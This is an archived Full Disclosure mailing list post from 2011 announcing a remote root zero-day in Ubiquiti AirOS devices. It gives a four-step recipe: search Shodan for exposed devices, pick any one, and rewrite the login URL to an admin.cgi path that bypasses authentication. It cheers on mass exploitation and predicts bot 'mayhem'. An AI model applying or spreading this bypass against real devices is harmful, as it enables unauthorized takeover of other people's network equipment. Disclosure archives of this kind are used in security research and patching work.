Home page logo

fulldisclosure logo Full Disclosure mailing list archives

AirOS remote root 0day
From: sd <sd () fucksheep org>
Date: Mon, 19 Dec 2011 18:38:25 +0100

since some genius decided to write worm for this, here is early santa
for you, kids:

1. http://www.shodanhq.com/search?q=airos
2. click arbitrary system
3. change http://X.X.X.X/login.cgi?uri=/ to http://X.X.X.X/admin.cgi/sd.css
4. profit?

IRCNet opers: expect some decent KNB bot mayhem for a while :)

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]